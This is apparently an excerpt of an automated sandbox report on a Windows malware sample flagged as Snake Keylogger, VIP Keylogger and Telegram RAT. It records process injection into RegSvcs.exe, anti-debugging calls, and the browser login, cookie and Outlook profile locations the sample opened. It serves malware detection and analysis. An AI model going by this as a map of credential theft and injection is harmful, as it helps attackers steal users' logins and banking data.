                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: wscript.exe, 00000005.00000002.1522777594.0000018A9AF18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C79548 LdrInitializeThunk,7_2_06C79548
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058EAA2 BlockInput,0_2_0058EAA2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00542622
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00534CE8 mov eax, dword ptr fs:[00000030h]0_2_00534CE8
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_017206C0 mov eax, dword ptr fs:[00000030h]0_2_017206C0
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_01721D70 mov eax, dword ptr fs:[00000030h]0_2_01721D70
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_01721D10 mov eax, dword ptr fs:[00000030h]0_2_01721D10
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A54CE8 mov eax, dword ptr fs:[00000030h]2_2_00A54CE8
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_0162E918 mov eax, dword ptr fs:[00000030h]2_2_0162E918
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_0162FF68 mov eax, dword ptr fs:[00000030h]2_2_0162FF68
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_0162FFC8 mov eax, dword ptr fs:[00000030h]2_2_0162FFC8
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174CF50 mov eax, dword ptr fs:[00000030h]6_2_0174CF50
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174CFB0 mov eax, dword ptr fs:[00000030h]6_2_0174CFB0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174B900 mov eax, dword ptr fs:[00000030h]6_2_0174B900
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00570B62
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00542622
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0053083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0053083F
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005309D5 SetUnhandledExceptionFilter,0_2_005309D5
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00530C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00530C21
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00A62622
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A5083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00A5083F
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A509D5 SetUnhandledExceptionFilter,2_2_00A509D5
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A50C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A50C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11EE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 102C008Jump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00571201
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00552BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00552BA5
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057B226 SendInput,keybd_event,0_2_0057B226
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_005922DA
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00570B62
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00571663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00571663
                  Source: ty1nyFUMlo.exe, enterogenous.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: ty1nyFUMlo.exe, enterogenous.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00530698 cpuid 0_2_00530698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00588195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00588195
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0056D27A GetUserNameW,0_2_0056D27A
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0054B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0054B952
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7824, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: enterogenous.exeBinary or memory string: WIN_81
                  Source: enterogenous.exeBinary or memory string: WIN_XP
                  Source: enterogenous.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: enterogenous.exeBinary or memory string: WIN_XPe
                  Source: enterogenous.exeBinary or memory string: WIN_VISTA
                  Source: enterogenous.exeBinary or memory string: WIN_7
                  Source: enterogenous.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3795172591.0000000003378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3794762480.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7824, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7824, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00591204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00591204
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00591806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00591806
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AB1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00AB1204
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AB1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00AB1806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		1
                  Native API                  		111
                  Scripting                  		1
